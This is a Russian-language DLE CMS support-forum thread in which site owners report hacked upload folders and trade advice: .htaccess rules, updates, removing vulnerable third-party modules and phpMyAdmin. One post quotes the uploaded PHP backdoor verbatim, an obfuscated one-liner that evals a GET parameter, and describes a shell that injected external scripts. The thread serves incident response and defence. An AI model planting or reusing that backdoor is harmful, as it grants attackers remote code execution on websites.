Залили вирус iframe

[karpel 0]

Добрый день, ко мне на сайт залили вредоносный код в папку /uploads/fotos/iframe.html о чем меня благополучно уведомил Google.

Каким образом удалось это сделать?

Установлена лицензионная DLE 9.5

[WWW.ZEOS.IN 1161]

Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован.

[karpel 0]

Сайт softik.ws

[celsoft 6242]

1. Убирайте с сайта сомнительные PHP партнерки со скрипта, которые у вас стоят. И другие строронние модули.

2. Также читайте темы:

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

[madmike3 0]

Имею аналогичную проблему c DLE 8.5.

Сайт http://marketopedia.ru - залиты "чужие" файлы phtml и php в папки

uploads/fotos/

uploads/posts/thumbs/ файл phtml в этой папке содержал такой код (похоже как раз на injections):

<? echo eval($_GET[base64_decode('Yw==')]);?>

второй был уже сам shell, через который дальше вставляли свой код на страницы, могу прислать почтой (как txt). Через шелл добавляли в БД в начало каждой новости (короткой и полной) вызов java-скрипта с другого сайта. Поменял пароли ftp и БД, закрыл все вложенные папки upolads файлами .htacces примерно следующего содержания:

<Files ~ "^.*\.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)">

    Order allow,deny

    Deny from all

</Files>

RemoveType .php3 .php .shtml .phtml .php4 .php5 .php6 .cgi .pl

Странно, что по умолчанию в образе движка эти папки не были закрыты htaccess.

Запретил редактирование шаблона из админки (правами папки).

Что еще можно сделать для защиты?

[WWW.ZEOS.IN 1161]

Что еще можно сделать для защиты?

Обновиться до версии 9.5

Следить за http://dle-news.ru/bags/

[madmike3 0]

Обновиться до версии 9.5

Следить за http://dle-news.ru/bags/

Обновляться платно мне смысла нет - для этого сайта даже функционал 8.5 избыточен.

В районе нового года все обновления безопасности накатывал, сайт поломали позже.

[celsoft 6242]

madmike3,

А кто вам сказал что вам залили через DLE, а например не через http://marketopedia.ru/forum/ или например не через уязвимый на вашем сервере https://marketopedia.ru/myadmin/ который у вас реально уязвим и можно загружать шеллы http://www.phpmyadmin.net/home_page/security/

Иногда я просто удивляюсь людям, при посещении просто их сайта я могу сказать несколько уязвимостей на сайте без DLE. А они думают что у них проблема в том что не было .htaccess, этот файл блокирует запуск скриптов а не заливку. Устранять нужно причину проблемы а не придумывать какие то обходные пути.

[Japonec 8]

Форум тот, это жесть полная , снеси его пока непозно.

[madmike3 0]

Чем этот форум заменить?

LogicBoard лучше?

А кто вам сказал что вам залили через DLE, а например не через ...

Иногда я просто удивляюсь людям, при посещении просто их сайта я могу сказать несколько уязвимостей на сайте без DLE. А они думают что у них проблема в том что не было .htaccess, этот файл блокирует запуск скриптов а не заливку. Устранять нужно причину проблемы а не придумывать какие то обходные пути.

Видимо, это удивление как раз и помешало вам заметить, что я нигде не писал, что шелл залит именно через DLE. Я пытаюсь разобраться, как мне обезопасить сайт на DLE. Если обратился не по адресу - извините, думал, что вам эта проблема может быть интересна.

Кстати, еще такой момент - у меня почему-то при сохранении образа базы через админку стало создаваться сначала два, а сейчас - три одинаковых файла. Это нормально?

[prikindel 255]

что я нигде не писал, что шелл залит именно через DLE

и тем не менее ты пришел на форум поддержки ДЛЕ.

[madmike3 0]

и тем не менее ты пришел на форум поддержки ДЛЕ.

Если смысл предложения, следующего за процитированным, от вас ускользает - считайте, что это совпадение.

[prikindel 255]

суть в том, ты пришел на форум ДЛЕ с проблемой взлома, и в сообщении не указал никаких других сторонних скриптов, установленных на сервере.

логично и естественно предположить, что ты грешишь на дле. что, собственно, подтверждают сообщения участников форума.

а потом начинаешь еще и язвить. попустись немного, ок?

и свой тонкий юмор оставь для подружек.

[madmike3 0]

логично и естественно предположить, что ты грешишь на дле

Если есть сайт, который взломали (мне лично пока неизвестно, как именно - админы сервера тоже подключены к поискам) - логично и естественно за консультацией обратиться в т.ч. к поставщику использованной платной CMS. Нет?

Я ни одного слова плохого не написал про саму CMS, лишь спросил, как можно обезопасить сайт, работающий на ней. Более того - в посте, на который вы ответили, я очень конкретно объяснил, зачем я именно сюда пришел. Поэтому ваш следующий пост "и тем не менее ты пришел на форум поддержки ДЛЕ" мне показался следствием невнимательного прочтения моего сообщения.

[prikindel 255]

ладно, все в порядке

из форумов рекомендовал бы IPB. да платный, за то крутой функционал и за ним хорошо следят разрабы

[madmike3 0]

IPB не просто платный - он дорогой.

Кроме того, чем нравится именно dle-forum - он использует шаблон сайта (встраивается в область контента), что для моего проекта (где форум не основное) более желательный вариант.

[Japonec 8]

ладно, все в порядке

из форумов рекомендовал бы IPB. да платный, за то крутой функционал и за ним хорошо следят разрабы

ИБР (Российское представительство) похоже ёк, у меня лиц на ИПБ и похоже 3.3 новую приидётся покупать за ново у америкосов.

К ипб+дле есть интегра у Калиостро (15 бачей всего)

Кстати ипб тут стоит (шаблон от Фисаны)

IPB не просто платный - он дорогой.

Кроме того, чем нравится именно dle-forum - он использует шаблон сайта (встраивается в область контента), что для моего проекта (где форум не основное) более желательный вариант.

Я не чего не имею против ShVad, всёж как ни как старается, но всёж dle-forum пока далёк от даже логикбоард и других сравнительно молодых скриптов.

[madmike3 0]

LB я сейчас на другом проекте тестирую. Если проблем не будет - заменю на него. IPB у меня тоже есть на еще одном проекте, возможности хорошо знаю, но покупать для этого сайта не готов, да и интеграция (не только синхронизация аккаунтов) потребует много усилий.